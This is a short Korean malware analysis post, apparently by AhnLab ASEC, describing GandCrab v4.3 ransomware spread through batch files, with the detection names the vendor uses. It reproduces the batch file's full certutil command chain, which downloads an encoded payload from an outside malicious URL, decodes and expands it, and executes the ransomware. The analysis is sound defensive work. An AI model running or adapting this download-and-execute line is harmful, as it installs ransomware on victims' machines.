안랩 ASEC은 9월 6일 배치파일(*.bat) 형태로 유포되는 Gandcrab v4.3을 발견하였다. 이 배치파일은 certutil 이라는 윈도우즈 기본 명령을 이용해 동작한다.

동작하는 과정은 먼저 특정 URL에서 파일을 다운로드 받는다. 다운로드 받은 바이너리는 서명 파일인것처럼 위장한 BASE64형태로 인코딩 되어있다. 그리고 -decode 옵션을 이용해 Base64 디코드 후 cab 파일로 저장한다. cab파일은 압축 파일로 -expand 옵션으로 압축해제 후 실행하면 Gandcrab 랜섬웨어가 실행된다.

[그림-1] 동작 방식


certutil -urlcache -split -f http://files.occarlsongracieteams.com/x/gate.php %TMP%\ercg345c24.txt > NUL && certutil -decode %TMP%\ercg345c24.txt %TMP%\ercg345c24.cab > NUL && expand %TMP%\ercg345c24.cab %TMP%\ercg345c24.exe && %TMP%\ercg345c24.exe del %TMP%\ercg345c24.txt & del %TMP%\ercg345c24.cab

[표-1] 배치파일(.bat) 명령


이번 Gandcrab은 유포방법 뿐 아니라 외형에서도 새로운 점이 있다. 기존에 주로 사용하던 Microsoft Visual Cpp 8.0/9.0 컴파일러가 아닌 NullSoft Installer 형태로 인젝션하여 동작한다.

현재 안랩 제품에서는 배치파일 및 Gandcrab 랜섬웨어를 다음과 같이 진단하고 있다.

 배치파일(*.bat) 

 BAT/Gandcrab (2018.09.07.00)

 다운로드 파일 (*.txt)

 BinImage/Gandcrab (2018.09.07.00)

 랜섬웨어 실행파일 (.exe)

 Trojan/Win32.Gandcrab.C2698070 (2018.09.06.06)   Malware/MDP.Ransom.1785


Posted by 분석팀